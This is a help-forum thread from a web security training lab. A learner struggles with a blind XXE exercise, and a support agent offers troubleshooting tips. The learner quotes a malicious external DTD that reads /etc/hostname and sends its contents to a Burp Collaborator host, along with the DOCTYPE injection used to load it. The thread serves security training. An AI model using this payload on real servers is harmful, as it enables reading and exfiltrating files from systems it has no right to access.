Name is required.
Email address is required.
Invalid email address
Answer is required.
Exceeding max length of 5KB

Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD

Chris Nov 02, 2019 08:06AM UTC

Hi I'm having trouble with this lab I think I'm doing it right but not sure every time I try it nothing happens. So the challenge is I need to use burpcollaborator to get a dns and http response. I go to Go to exploit server and store my dtd file in the file. then I get my url and put it in this command <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]> %xxe;]> then I send it in repeater and I look at my burpcollaborator and click poll now and nothing happens. Please let me know if I'm for getting a step or some thing.



Using Burp Suite Professional, go to the Burp menu, and launch the Burp Collaborator client.

Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.

Place the Burp Collaborator payload into a malicious DTD file:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://I have put my subdomain.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;

Click "Go to exploit server" and save the malicious DTD file on your server. Click "View stored response" and take a note of the URL.

Then exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite. Insert the following external entity definition in between the XML declaration and the stockCheck element:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "I have put my url"> %xxe;]>

Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again.

You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the /etc/hostname file.


Ben Wright Nov 04, 2019 09:08AM UTC Support Center agent

Hi,

Thank you for your message.

The process you are following looks correct to me. I have just attempted this lab and was able to solve it using the solution provided so the lab is working correctly.

A couple of things to look out for:

Are you copying the full Burp Collaborator payload correctly, i.e. something like http://qc62a6b7j69sdkfypp1g03murlxcl1.burpcollaborator.net

Are you copying the correct exploit URL? This should be the URL that is in the address bar after you click the View exploit button i.e. something like https://acfb1fc51f86054780b0109501b3009b.web-security-academy.net/exploit

Lastly, we have had the occasional issue when users have copied the text directly from the solution (sometimes unrecognised characters have slipped into the text, which has affected the viability of the answer) so it is also worth typing out the various payloads etc rather than copying them directly.

Please let us know if you need any further assistance.


Post Your public answer

Your name
Your email address
Answer